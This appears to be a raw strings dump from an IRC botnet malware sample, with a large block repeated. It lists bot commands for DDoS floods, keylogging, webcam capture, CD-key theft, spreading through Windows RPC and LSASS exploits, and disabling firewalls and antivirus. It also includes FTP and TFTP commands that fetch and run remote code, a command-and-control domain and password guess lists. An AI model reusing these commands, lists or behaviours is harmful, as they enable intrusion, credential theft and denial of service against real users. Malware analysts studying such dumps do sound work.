Sending %d pings to %s. packet size: %d, timeout: %d(ms).
rape.pf
Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
rape.uf
%s Exploitation started on %s:%d waiting %d seconds for %d minutes using %d threads.
[%s] * %s %s
irc.clone.ac
[%s] <%s> %s
irc.clone.pm
Failed to start scan thread, error: <%d>.
Port scan started: %s:%d with delay: %d(ms).
root.ps
Failed to start redirection thread, error: <%d>.
TCP redirect created from: %s:%d to: %s:%d.
server.rd
Failed to start transfer thread, error: <%d>.
Downloading URL: %s to: %s.
web.dl.g
rape.sf
Failed to start clone thread, error: <%d>.
Created on %s:%d, in channel %s.
irc.clone.st
Flooding: (%s) for %s seconds.
rape.ic
Rename: '%s' to: '%s'.
sys.rn
Failed to start search thread, error: <%d>.
Searching for file: %s in: %s.
sys.ff
] (exec.p
Commands: %s
Couldn't execute file.
Failed to start download thread, error: <%d>.
Downloading update from: %s.
%s%s.exe
web.dl.up
irc.de
Repeat not allowed in command line: %s
Repeat: %s
irc.rp
PART %s
irc.clone.p
JOIN %s %s
irc.clone.j
Nick (%s): %s
irc.clone.ni
Mode (%s): %s
MODE %s
irc.clone.m
Raw (%s): %s
irc.clone.raw
Mode change: %s
irc.cy
Action: %s: %s.
ACTION %s
irc.ac
Privmsg: %s: %s.
irc.pm
Alias added: %s.
irc.aa
Gethost: %s.
Gethost: %s, Command: %s
%s %s %s :%s
irc.gh
Error while capturing amateur video from webcam.
Amateur video saved to: %s.
Invalid parameters for webcam capture.
Error while capturing from webcam.
Webcam capture saved to: %s.
Driver #%d - %s - %s.
Screen capture saved to: %s.
sys.cap
Failed to load advapi32.dll or netapi32.dll.
sys.net
.n.z.m. (keylog.p.l.g) .
. Failed to start logging thread, error: <%d>.
. Key logger active.
. No key logger thread found.
. Key logger stopped. (%d thread(s) stopped.)
sys.kl
Carnivore stopped. (%d thread(s) stopped.)
Failed to start sniffer thread, error: <%d>.
Read file failed: %s
Read file complete: %s
sys.rf
sys.cmd
mirc.cmd
Failed to start connection thread, error: <%d>.
URL: %s.
web.v
List: %s
sys.fl
Send File: %s, User: %s.
mirc.dcc.get
Deleted '%s'.
sys.del
Failed to terminate process ID: %s
Process killed ID: %s
sys.kpid
Failed to terminate process: %s
Process killed: %s
sys.kpn
Lookup: %s -> %s.
irc.dns
Server changed to: '%s'.
irc.se
15 Couldn't open file: %s
15 File opened: %s
Prefix changed to: '%c'.
irc.pr
irc.clone.rn
irc.clone.q
Failed to kill thread: %s.
Killed thread: %s.
Stopped: %d thread(s).
irc.tk
IRC Raw: %s.
irc.raw
Parted channel: '%s'.
irc.pt
Joined channel: '%s'.
Nick changed to: '%s'.
Failed to start scan, port is invalid.
%s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
Already %d scanning threads. Too many specified.
root.mass
Failed to start server thread, error: <%d>.
server.tf.on
server.web.on
root.cip
Failed to load dnsapi.dll.
irc.fdns
irc.farp
com.gc
com.getclip
Login list complete.
%d. %s
-[Login List]-
irc.who
[CMD]
sys.cmd.off
sys.cmd.on
sys.dll
sys.di
Uptime: %s.
sys.up
] (cdkeys.p
sys.key
Failed to start listing thread, error: <%d>.
sys.ps.on
irc.rmb
sys.si
Failed to start flood thread, error: <%d>.
Flooding: (%s:%s) for %s seconds.
rape.ssf
sys.ni
irc.clg
irc.lg.on
irc.al
Failed to start list thread, error: <%d>.
irc.tl
Bot ID: %s.
irc.id
Status: Ready. Bot Uptime: %s.
irc.st
QUIT :%s
irc.dc
irc.rc
root.st
root.stats
root.stop
sys.ld.stop
irc.clone.off
sys.ps.off
sys.ff.off
server.tf.off
rape.pf.off
UDP flood
rape.uf.off
rape.sf.off
rape.df.off
TCP redirect
server.rd.off
irc.lg.off
server.web.off
server.s4.off
server.s4.on
ld.off
sys.ld.off
ld.on
sys.ld.on
irc.ver
Invalid login slot number: %d.
No user logged in at slot: %d.
irc.lo
irc.di
Random nick change: %s
irc.rn
$rndnick
User: %s logged in.
Password accepted.
*Failed host auth by: (%s!%s).
*Failed pass auth by: (%s!%s).
NOTICE %s :You've been logged.
NOTICE %s :Nice try, idiot. (%s!%s).
irc.li
Chat failed by unauthorized user: %s.
Chat already active with user: %s.
Failed to start chat thread, error: <%d>.
Chat from user: %s.
Receive file: '%s' failed from unauthorized user: %s.
NOTICE %s :
PING %s
%s has just versioned me.
VERSION %s
Receive file: '%s' from user: %s.
User: %s logged out.
Joined channel: %s.
:%s%s
NICK
NOTICE %s :%s
User %s logged out.
PONG %s
%s (%d)
[%s]|
[%d]%s
IP: %s Port: %d is open.
Scanning IP: %s, Port: %d.
Netapi32.dll couldn't be loaded.
Failed to delete '%S' share.
Share '%S' deleted.
Failed to delete '%s' share.
Share '%s' deleted.
Advapi32.dll couldn't be loaded.
Failed to open IPC$ Restriction registry key.
Failed to open DCOM registry key.
Failed to add '%s' share.
Share '%s' added.
Failed to open IPC$ restriction registry key.
tPTF.exe -i get
%s: No %s thread found.
%s: %s stopped. (%d thread(s) stopped.)
[04-12-2015 06:36:53]
[04-12-2015 06:36:52]
[04-12-2015 06:36:51]
%System%\explore.exe
TransactNamedPipe
PeekNamedPipe
CreatePipe
GetCPInfo
.text
`.rdata
@.data
.sxdata
KERNEL32.DLL
WS2_32.dll
\C$\123456111111111111111.doc
Windows 2000 2195
Windows 2000 5.0
\\192.168.1.210\IPC$
\PIPE\

explore.exe_464_rwx_00400000_0034C000:

GET / HTTP/1.0
Host: %s
Authorization: Negotiate %s
__MSVCRT_HEAP_SELECT
Send error: <%d>.
ddos.random
ddos.ack
ddos.syn
Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
Error: setsockopt() failed, returned: <%d>.
Error: socket() failed, returned: <%d>.
] (tcp.p
] (keylog.p
[%d-%d-%d %d:%d:%d] %s
%s (Return) (%s)
%s (Buffer full) (%s)
%s (Changed Windows: %s)
:.login
:,login
:!login
:@login
:$login
:%login
:^login
:&login
:*login
:-login
: login
:/login
:\login
:=login
:?login
:'login
:`login
:~login
: login
:.auth
:.hashin
:.secure
:.syn
:%syn
CDKey
JOIN #
NICK
now an IRC Operator
paypal.com
PAYPAL.COM
Error: recv() failed, returned: <%d>
Suspicious %s packet from: %s:%d - %s.
Error: WSAIoctl() failed, returned: <%d>.
Error: bind() failed, returned: <%d>.
] (%s.p
trying to root %s
] (tPTF.p
transfer complete to IP: %s
\\%s\pipe\epmapper
Windows for Workgroups 3.1a
WinXP Professional [universal] lsass.exe
Win2k Professional [universal] netrap.dll
Win2k Advanced Server [SP4] netrap.dll
echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s
tftp -i %s get %s
\\%s\ipc$
] (%s.e
cmd /k echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s
Windows uk 2k3 ee sp0 24
Windows uk 2k3 ee sp0 23
Windows uk 2k3 ee sp0 22
Windows uk 2k3 ee sp0 21
Windows uk 2k3 ee sp0 20
Windows uk 2k3 ee sp0 19
Windows uk 2k3 ee sp0 18
Windows uk 2k3 ee sp0 17
Windows uk 2k3 ee sp0 16
Windows uk 2k3 ee sp0 15
Windows uk 2k3 ee sp0 14
Windows uk 2k3 ee sp0 13
Windows uk 2k3 ee sp0 12
Windows uk 2k3 ee sp0 11
Windows uk 2k3 ee sp0 10
Windows uk 2k3 ee sp0 9
Windows uk 2k3 ee sp0 8
Windows uk 2k3 ee sp0 7
Windows uk 2k3 ee sp0 6
Windows uk 2k3 ee sp0 5
Windows uk 2k3 ee sp0 4
Windows uk 2k3 ee sp0 3
Windows uk 2k3 ee sp0 2
Windows uk 2k3 ee sp0 1
Windows uk 2k3 se sp0 24
Windows uk 2k3 se sp0 23
Windows uk 2k3 se sp0 22
Windows uk 2k3 se sp0 21
Windows uk 2k3 se sp0 20
Windows uk 2k3 se sp0 19
Windows uk 2k3 se sp0 18
Windows uk 2k3 se sp0 17
Windows uk 2k3 se sp0 16
Windows uk 2k3 se sp0 15
Windows uk 2k3 se sp0 14
Windows uk 2k3 se sp0 13
Windows uk 2k3 se sp0 12
Windows uk 2k3 se sp0 11
Windows uk 2k3 se sp0 10
Windows uk 2k3 se sp0 9
Windows uk 2k3 se sp0 8
Windows uk 2k3 se sp0 7
Windows uk 2k3 se sp0 6
Windows uk 2k3 se sp0 5
Windows uk 2k3 se sp0 4
Windows uk 2k3 se sp0 3
Windows uk 2k3 se sp0 2
Windows uk 2k3 se sp0 1
Windows uk xp pro sp1 25
Windows uk xp pro sp1 24
Windows uk xp pro sp1 23
Windows uk xp pro sp1 22
Windows uk xp pro sp1 21
Windows uk xp pro sp1 20
Windows uk xp pro sp1 19
Windows uk xp pro sp1 18
Windows uk xp pro sp1 17
Windows uk xp pro sp1 16
Windows uk xp pro sp1 15
Windows uk xp pro sp1 14
Windows uk xp pro sp1 13
Windows uk xp pro sp1 12
Windows uk xp pro sp1 11
Windows uk xp pro sp1 10
Windows uk xp pro sp1 9
Windows uk xp pro sp1 8
Windows uk xp pro sp1 7
Windows uk xp pro sp1 6
Windows uk xp pro sp1 5
Windows uk xp pro sp1 4
Windows uk xp pro sp1 3
Windows uk xp pro sp1 2
Windows uk xp pro sp1 1
Windows 2000 SP4 GER FAT32
Windows nl sp1 23
Windows nl sp1 22
Windows nl sp1 21
Windows nl sp1 20
Windows nl sp1 19
Windows nl sp1 18
Windows nl sp1 17
Windows nl sp1 16
Windows nl sp1 15
Windows nl sp1 14
Windows nl sp1 13
Windows nl sp1 12
Windows nl sp1 11
Windows nl sp1 10
Windows nl sp1 9
Windows nl sp1 8
Windows nl sp1 7
Windows nl sp1 6
Windows nl sp1 5
Windows nl sp1 4
Windows nl sp1 3
Windows nl sp1 2
Windows nl sp1 1
Windows XP SP0 1 ENG
Windows XP SP0 1 GER NL IT FR
\\%s\pipe\wkssvc
%s, port:%d now executing %s on remote machine.
200 PORT command successful.
%s.%s.%s.%s
PORT
425 Passive not supported on this server
215 NzmxFtpd
331 Password required
%s %s
220 NzmxFtpd 0wns j0
] (httpd.p
Error: server failed, returned: <%d>.
HTTP/1.0 200 OK
Content-Type: %s
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
Failed to start worker thread, error: <%d>.
Worker thread of server thread: %d.
PRIVMSG %s :Found %s Files and %s Directories
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
"><CODE>%s</CODE></A>
PRIVMSG %s :%-31s %-21s (%s bytes)
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
"><CODE>%s/</CODE></A>
%s%s/
<TD WIDTH="%d"><A HREF="
PRIVMSG %s :%-31s %-21s
%2.2d/%2.2d/M %2.2d:%2.2d %s
<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></TD>
Searching for: %s
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
<H1>Index of %s</H1>
<TITLE>Index of %s</TITLE>
PRIVMSG %s :Searching for: %s
%s %s HTTP/1.1
Referer: %s
transfer to %s
, info: (%s).
File not found: %s (%s).
Failed to open file: %s.
Total: %d in %s.
%s: %d,
] (portscan.p
Current IP: %s.
Failed to start server, error: <%d>.
Server listening on IP: %s:%d, Directory: %s\.
] (PTF.p
Server started on Port: %d, File: %s, Request: %s.
%d.%d.%d.%d
IP: %s, Port %d is open.
IP: %s:%d, Scan thread: %d, Sub-thread: %d.
Finished at %s:%d after %d minute(s) of scanning.
%s:%d, Scan thread: %d, Sub-thread: %d.
Failed to start client thread, error: <%d>.
Client connection from IP: %s:%d, Server thread: %d.
Failed to start connection thread, error: <%d>.
Client connection to IP: %s:%d, Server thread: %d.
Failed to start server on Port %d.
Failed to start client thread, error: <%d>.
Client connection from IP: %s:%d, Server thread: %d.
Server started on: %s:%d.
Error: Failed to connect to target, returned: <%d>.
Error: Failed to open socket(), returned: <%d>.
Authentication failed. Remote userid: %s != %s.
Key3=
Key2=
Key1=
nwncdkey.ini
base\mp\sof2key
Chrome
Software\Techland\Chrome
Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc
Software\Electronic Arts\EA Sports\NHL 2003\ergc
Software\Electronic Arts\EA Sports\NHL 2002\ergc
Software\Electronic Arts\EA Sports\FIFA 2003\ergc
Software\Electronic Arts\EA Sports\FIFA 2002\ergc
Global Operations
Software\Electronic Arts\EA GAMES\Global Operations\ergc
Microsoft Windows Product ID
Software\Microsoft\Windows\CurrentVersion
prvkey
CDKey
%s\%s
%s CD Key: (%s).
Files found: %d.
Searching for file: %s.
Found: %s\%s
avicap32.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
iphlpapi.dll
dnsapi.dll
netapi32.dll
icmp.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
gdi32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
GetKeyState
GetAsyncKeyState
ExitWindowsEx
user32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
%s Error: %s <%d>.
explorer.exe
%%comspec%% /c %s %s
del "%s"
%sdel.bat
c:\a.bat
Echo REGEDIT4>%temp%\1.reg
Echo.>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg
Echo "TransportBindName"="">>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg
Echo "Start"=dword:00000004>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]>>%temp%\1.reg
Echo "EnableDCOM"="N">>%temp%\1.reg
Echo "EnableRemoteConnect"="N">>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]>>%temp%\1.reg
Echo "restrictanonymous"=dword:00000001>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT1.0\Server]>>%temp%\1.reg
Echo "Enabled"=hex:00>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>%temp%\1.reg
Echo "AutoShareWks"=dword:00000000>>%temp%\1.reg
Echo "AutoShareServer"=dword:00000000>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]>>%temp%\1.reg
Echo "NameServer"="">>%temp%\1.reg
Echo "ForwardBroadcasts"=dword:00000000>>%temp%\1.reg
Echo "IPEnableRouter"=dword:00000000>>%temp%\1.reg
Echo "Domain"="">>%temp%\1.reg
Echo "SearchList"="">>%temp%\1.reg
Echo "UseDomainNameDevolution"=dword:00000001>>%temp%\1.reg
Echo "EnableICMPRedirect"=dword:00000000>>%temp%\1.reg
Echo "DeadGWDetectDefault"=dword:00000001>>%temp%\1.reg
Echo "DontAddDefaultGatewayDefault"=dword:00000000>>%temp%\1.reg
Echo "EnableSecurityFilters"=dword:00000001>>%temp%\1.reg
Echo "AllowUnqualifiedQuery"=dword:00000000>>%temp%\1.reg
Echo "PrioritizeRecordData"=dword:00000001>>%temp%\1.reg
Echo "TCP1320Opts"=dword:00000003>>%temp%\1.reg
Echo "KeepAliveTime"=dword:00023280>>%temp%\1.reg
Echo "BcastQueryTimeout"=dword:000002ee>>%temp%\1.reg
Echo "BcastNameQueryCount"=dword:00000001>>%temp%\1.reg
Echo "CacheTimeout"=dword:0000ea60>>%temp%\1.reg
Echo "Size/Small/Medium/Large"=dword:00000003>>%temp%\1.reg
Echo "LargeBufferSize"=dword:00001000>>%temp%\1.reg
Echo "SynAckProtect"=dword:00000002>>%temp%\1.reg
Echo "PerformRouterDiscovery"=dword:00000000>>%temp%\1.reg
Echo "EnablePMTUBHDetect"=dword:00000000>>%temp%\1.reg
Echo "FastSendDatagramThreshold "=dword:00000400>>%temp%\1.reg
Echo "StandardAddressLength "=dword:00000018>>%temp%\1.reg
Echo "DefaultReceiveWindow "=dword:00004000>>%temp%\1.reg
Echo "DefaultSendWindow"=dword:00004000>>%temp%\1.reg
Echo "BufferMultiplier"=dword:00000200>>%temp%\1.reg
Echo "PriorityBoost"=dword:00000002>>%temp%\1.reg
Echo "IrpStackSize"=dword:00000004>>%temp%\1.reg
Echo "IgnorePushBitOnReceives"=dword:00000000>>%temp%\1.reg
Echo "DisableAddressSharing"=dword:00000000>>%temp%\1.reg
Echo "AllowUserRawAccess"=dword:00000000>>%temp%\1.reg
Echo "DisableRawSecurity"=dword:00000000>>%temp%\1.reg
Echo "DynamicBacklogGrowthDelta"=dword:00000032>>%temp%\1.reg
Echo "FastCopyReceiveThreshold"=dword:00000400>>%temp%\1.reg
Echo "LargeBufferListDepth"=dword:0000000a>>%temp%\1.reg
Echo "MaxActiveTransmitFileCount"=dword:00000002>>%temp%\1.reg
Echo "MaxFastTransmit"=dword:00000040>>%temp%\1.reg
Echo "OverheadChargeGranularity"=dword:00000001>>%temp%\1.reg
Echo "SmallBufferListDepth"=dword:00000020>>%temp%\1.reg
Echo "SmallerBufferSize"=dword:00000080>>%temp%\1.reg
Echo "TransmitWorker"=dword:00000020>>%temp%\1.reg
Echo "DNSQueryTimeouts" =hex(7):31,00,00,00,32,00,00,00,32,00,00,00,34,00,00,00,38,00,00,00,30,00,00,00,00,00>>%temp%\1.reg
Echo "DefaultRegistrationTTL"=dword:00000014>>%temp%\1.reg
Echo "DisableReplaceAddressesInConflicts"=dword:00000000>>%temp%\1.reg
Echo "DisableReverseAddressRegistrations"=dword:00000001>>%temp%\1.reg
Echo "UpdateSecurityLevel "=dword:00000000>>%temp%\1.reg
Echo "DisjointNameSpace"=dword:00000001>>%temp%\1.reg
Echo "QueryIpMatching"=dword:00000000>>%temp%\1.reg
Echo "NoNameReleaseOnDemand"=dword:00000001>>%temp%\1.reg
Echo "EnableDeadGWDetect"=dword:00000000>>%temp%\1.reg
Echo "EnableFastRouteLookup"=dword:00000001>>%temp%\1.reg
Echo "MaxFreeTcbs"=dword:000007d0>>%temp%\1.reg
Echo "MaxHashTableSize"=dword:00000800>>%temp%\1.reg
Echo "SackOpts"=dword:00000001>>%temp%\1.reg
Echo "Tcp1323Opts"=dword:00000003>>%temp%\1.reg
Echo "TcpMaxDupAcks"=dword:00000001>>%temp%\1.reg
Echo "TcpRecvSegmentSize"=dword:00000585>>%temp%\1.reg
Echo "TcpSendSegmentSize"=dword:00000585>>%temp%\1.reg
Echo "TcpWindowSize"=dword:0007d200>>%temp%\1.reg
Echo "DefaultTTL"=dword:00000030>>%temp%\1.reg
Echo "TcpMaxHalfOpen"=dword:0000004b>>%temp%\1.reg
Echo "TcpMaxHalfOpenRetried"=dword:00000050>>%temp%\1.reg
Echo "TcpTimedWaitDelay"=dword:00000000>>%temp%\1.reg
Echo "MaxNormLookupMemory"=dword:00030d40>>%temp%\1.reg
Echo "FFPControlFlags"=dword:00000001>>%temp%\1.reg
Echo "FFPFastForwardingCacheSize"=dword:00030d40>>%temp%\1.reg
Echo "MaxForwardBufferMemory"=dword:00019df7>>%temp%\1.reg
Echo "MaxFreeTWTcbs"=dword:000007d0>>%temp%\1.reg
Echo "GlobalMaxTcpWindowSize"=dword:0007d200>>%temp%\1.reg
Echo "EnablePMTUDiscovery"=dword:00000001>>%temp%\1.reg
Echo "ForwardBufferMemory"=dword:00019df7>>%temp%\1.reg
Echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]>>%temp%\1.reg
Echo "MaxConnectionsPer1_0Server"=dword:00000050>>%temp%\1.reg
Echo "MaxConnectionsPerServer"=dword:00000050>>%temp%\1.reg
START /WAIT REGEDIT /S %temp%\1.reg
DEL %temp%\1.reg
Not supported by this system.
Error getting ARP cache: <%d>.
Finished sending pings to %s.
Error sending pings to %s.
] (udp.p
Finished sending packets to %s.
PRIVMSG %s :%s
] (cmd.p
Failed to start IO thread, error: <%d>.
cmd.exe
Ý %dh %dm
[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]: %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]: %s. [Uptime]: %s.
%s (%s)
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
Failed to connect to HTTP server.
Invalid URL.
Failed to get requested URL from HTTP server.
URL visited.
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
Transfer complete to IP: %s, Filename: %s (%s bytes).
DCC SEND %s %i %i %i
Transfer complete from IP: %s, Filename: %s (%s bytes).
Bad URL, or DNS Error: %s.
Update failed: Error executing file: %s.
Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
Opened: %s.
Downloaded %.1f KB to %s @ %.1f KB/sec.
CRC Failed (%d != %d).
Filesize is incorrect: (%d != %d).
Update: %s (%dKB transferred).
File download: %s (%dKB transferred).
Couldn't open file: %s.
%s Drive (%s): %s total, %s free, %s available.
%s Drive (%s): Failed to stat, device not ready.
%s %s :%s
PRIVMSG
%s: No service specified.
Error with service: '%s'. %s
%s service: '%s'.
%s: %s (%s)
The following Windows services are registered:
%s: No share specified.
%s share: '%s'.
%s: Error with share: '%s'. %s
Share list error: %s <%ld>
%s: No username specified.
%s: Error with username: '%s'. %s
%s username: '%s'.
Units Per Week: %d
Max. Storage: %d
User's Language: %d
Country Code: %d
Workstations: %S
Logon Server: %S
Last Logoff: %d
Last Logon: %d
Number of Logins: %d
Bad Password Count: %d
Password Age: %d
Parameters: %S
Home Directory: %S
Auth Flags: %d
Privilege Level: %s
Comment: %S
User Comment: %S
Full Name: %S
Account: %S
Total users found: %d.
User list error: %s <%ld>
The password is shorter than required (or does not meet the password policy requirement.)
The operation is allowed only on the primary domain controller of the domain.
This network request is not supported.
%s <Server: %S> <Message: %S>
irc.kr3wzb4se.info
explore.exe
keys.txt
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
supported
windows95
windows98
windowsME
windows2k
WindowsXP
00000000
windows
webpage
supporte
support
smtp
report
passphra
operator
mickey
loginwor
keyword
keyin
keybord
asshole
mypass123
mypass
login
ihavenopass
passwd
88888888
11111111
123456789
12345678
1234567
PASSWORD
roffer v1.2b24 [20031215140650], hXXp://iroffer.org/
*@fbi.gov
Failed to start registry thread, error: <%d>.
Failed to start secure thread, error: <%d>.
Failed to start AV/FW killer thread, error: <%d>.
%s %d "%s"
Connected to %s.
NICK %s
USER %s 0 0 :%s
PASS %s
MODE %s %s
USERHOST %s
%s system.
Failed to start flood thread, error: <%d>.
Flooding: (%s:%s) for %s seconds.
Uploading file: %s to: %s failed.
Uploading file: %s to: %s
PTF.exe
-s:%s
open %s
put %s
%s\%i%i%i.dll
File not found: %s.
web.PTF.ul
web.hcon
15 Message sent to %s.
helo $rndnick
mail from: <%s>
rcpt to: <%s>
subject: %s
from: %s
web.email
%s %s flooding: (%s:%s) for %s seconds.
rape.tf
ICMP.dll not available
Sending %d pings to %s. packet size: %d, timeout: %d(ms).
rape.pf
Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
rape.uf
%s Exploitation started on %s:%d waiting %d seconds for %d minutes using %d threads.
[%s] * %s %s
irc.clone.ac
[%s] <%s> %s
irc.clone.pm
Failed to start scan thread, error: <%d>.
Port scan started: %s:%d with delay: %d(ms).
root.ps
Failed to start redirection thread, error: <%d>.
TCP redirect created from: %s:%d to: %s:%d.
server.rd
Failed to start transfer thread, error: <%d>.
Downloading URL: %s to: %s.
web.dl.g
rape.sf
Failed to start clone thread, error: <%d>.
Created on %s:%d, in channel %s.
irc.clone.st
Flooding: (%s) for %s seconds.
rape.ic
Rename: '%s' to: '%s'.
sys.rn
Failed to start search thread, error: <%d>.
Searching for file: %s in: %s.
sys.ff
] (exec.p
Commands: %s
Couldn't execute file.
Failed to start download thread, error: <%d>.
Downloading update from: %s.
%s%s.exe
web.dl.up
irc.de
Repeat not allowed in command line: %s
Repeat: %s
irc.rp
PART %s
irc.clone.p
JOIN %s %s
irc.clone.j
Nick (%s): %s
irc.clone.ni
Mode (%s): %s
MODE %s
irc.clone.m
Raw (%s): %s
irc.clone.raw
Mode change: %s
irc.cy
Action: %s: %s.
ACTION %s
irc.ac
Privmsg: %s: %s.
irc.pm
Alias added: %s.
irc.aa
Gethost: %s.
Gethost: %s, Command: %s
%s %s %s :%s
irc.gh
Error while capturing amateur video from webcam.
Amateur video saved to: %s.
Invalid parameters for webcam capture.
Error while capturing from webcam.
Webcam capture saved to: %s.
Driver #%d - %s - %s.
Screen capture saved to: %s.
sys.cap
Failed to load advapi32.dll or netapi32.dll.
sys.net
.n.z.m. (keylog.p.l.g) .
. Failed to start logging thread, error: <%d>.
. Key logger active.
. No key logger thread found.
. Key logger stopped. (%d thread(s) stopped.)
sys.kl
Carnivore stopped. (%d thread(s) stopped.)
Failed to start sniffer thread, error: <%d>.
Read file failed: %s
Read file complete: %s
sys.rf
sys.cmd
mirc.cmd
Failed to start connection thread, error: <%d>.
URL: %s.
web.v
List: %s
sys.fl
Send File: %s, User: %s.
mirc.dcc.get
Deleted '%s'.
sys.del
Failed to terminate process ID: %s
Process killed ID: %s
sys.kpid
Failed to terminate process: %s
Process killed: %s
sys.kpn
Lookup: %s -> %s.
irc.dns
Server changed to: '%s'.
irc.se
15 Couldn't open file: %s
15 File opened: %s
Prefix changed to: '%c'.
irc.pr
irc.clone.rn
irc.clone.q
Failed to kill thread: %s.
Killed thread: %s.
Stopped: %d thread(s).
irc.tk
IRC Raw: %s.
irc.raw
Parted channel: '%s'.
irc.pt
Joined channel: '%s'.
Nick changed to: '%s'.
Failed to start scan, port is invalid.
%s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
Already %d scanning threads. Too many specified.
root.mass
Failed to start server thread, error: <%d>.
server.tf.on
server.web.on
root.cip
Failed to load dnsapi.dll.
irc.fdns
irc.farp
com.gc
com.getclip
Login list complete.
%d. %s
-[Login List]-
irc.who
[CMD]
sys.cmd.off
sys.cmd.on
sys.dll
sys.di
Uptime: %s.
sys.up
] (cdkeys.p
sys.key
Failed to start listing thread, error: <%d>.
sys.ps.on
irc.rmb
sys.si
Failed to start flood thread, error: <%d>.
Flooding: (%s:%s) for %s seconds.
rape.ssf
sys.ni
irc.clg
irc.lg.on
irc.al
Failed to start list thread, error: <%d>.
irc.tl
Bot ID: %s.
irc.id
Status: Ready. Bot Uptime: %s.
irc.st
QUIT :%s
irc.dc
irc.rc
root.st
root.stats
root.stop
sys.ld.stop
irc.clone.off
sys.ps.off
sys.ff.off
server.tf.off
rape.pf.off
UDP flood
rape.uf.off
rape.sf.off
rape.df.off
TCP redirect
server.rd.off
irc.lg.off
server.web.off
server.s4.off
server.s4.on
ld.off
sys.ld.off
ld.on
sys.ld.on
irc.ver
Invalid login slot number: %d.
No user logged in at slot: %d.
irc.lo
irc.di
Random nick change: %s
irc.rn
$rndnick
User: %s logged in.
Password accepted.
*Failed host auth by: (%s!%s).
*Failed pass auth by: (%s!%s).
NOTICE %s :You've been logged.
NOTICE %s :Nice try, idiot. (%s!%s).
irc.li
Chat failed by unauthorized user: %s.
Chat already active with user: %s.
Failed to start chat thread, error: <%d>.
Chat from user: %s.
Receive file: '%s' failed from unauthorized user: %s.
NOTICE %s :
PING %s
%s has just versioned me.
VERSION %s
Receive file: '%s' from user: %s.
User: %s logged out.
Joined channel: %s.
:%s%s
NICK
NOTICE %s :%s
User %s logged out.
PONG %s
CFINET32.EXE
CFINET.EXE
CFIAUDIT.EXE
CFIADMIN.EXE
CFGWIZ.EXE
CFD.EXE
CDP.EXE
CCPXYSVC.EXE
CCEVTMGR.EXE
CCAPP.EXE
BVT.EXE
BUNDLE.EXE
BS120.EXE
BRASIL.EXE
BPC.EXE
BORG2.EXE
BOOTWARN.EXE
BOOTCONF.EXE
BLSS.EXE
BLACKICE.EXE
BLACKD.EXE
BISP.EXE
BIPCPEVALSETUP.EXE
BIPCP.EXE
BIDSERVER.EXE
BIDEF.EXE
BELT.EXE
BEAGLE.EXE
BD_PROFESSIONAL.EXE
BARGAINS.EXE
BACKWEB.EXE
AVXQUAR.EXE
AVXMONITORNT.EXE
AVXMONITOR9X.EXE
AVWUPSRV.EXE
AVWUPD32.EXE
AVWUPD.EXE
AVWINNT.EXE
AVWIN95.EXE
AVSYNMGR.EXE
AVSCHED32.EXE
AVPUPD.EXE
